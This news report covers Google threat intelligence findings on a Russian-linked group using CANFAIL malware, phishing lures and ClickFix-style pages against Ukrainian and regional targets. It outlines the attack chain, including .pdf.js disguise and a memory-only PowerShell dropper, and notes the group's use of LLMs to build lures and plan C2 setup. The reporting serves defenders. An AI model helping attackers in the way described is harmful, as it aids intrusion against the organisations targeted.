Attacks using the CANFAIL malware have been linked to a hitherto unknown threat actor. The hacker group may have been connected to Russian intelligence services, according to the Google Threat Intelligence Group (GTIG). According to the assessment, the threat actor has targeted government, military, defense, and energy institutions within the regional and national governments of Ukraine.

But the group has also shown increasing interest in aerospace groups, manufacturing firms with drone and military connections, nuclear and chemical research groups, and international groups that monitor the conflict and provide humanitarian aid in Ukraine, GTIG said. According to GTIG, "this actor recently started to overcome some technical limitations using LLMs [large language models], despite being less sophisticated and resourced than other Russian threat groups."

"They perform reconnaissance, make social engineering lures, and look for answers to fundamental technical questions for post-compromise activity and C2 infrastructure setup through prompting." The threat actor has been posing as reputable national and local Ukrainian energy organizations in recent phishing campaigns in order to gain unauthorized access to personal and organizational email accounts. Along with targeting a Romanian company and conducting reconnaissance on Moldovan organizations, the group is also accused of posing as a Romanian energy company that serves clients in Ukraine.

Based on their research, the threat actor creates email address lists specific to particular industries and regions in order to facilitate its operations. The attack chains embed links to a RAR file containing CANFAIL malware and appear to contain lures created by LLM.

CANFAIL is an obfuscated JavaScript malware that is typically disguised with a double extension to pass off as a PDF document (*.pdf.js). Its purpose is to run a PowerShell script, which then downloads and runs a memory-only PowerShell dropper. At the same time, it shows the victim a phony "error" message.

According to Google, the threat actor is also connected to the PhantomCaptcha campaign, which was revealed by SentinelOne SentinelLABS in October 2025 and targets organizations involved in Ukraine's war relief efforts. The campaign uses phishing emails that send recipients to phony websites that contain ClickFix-style instructions that activate the infection sequence and spread a trojan that is based on WebSockets.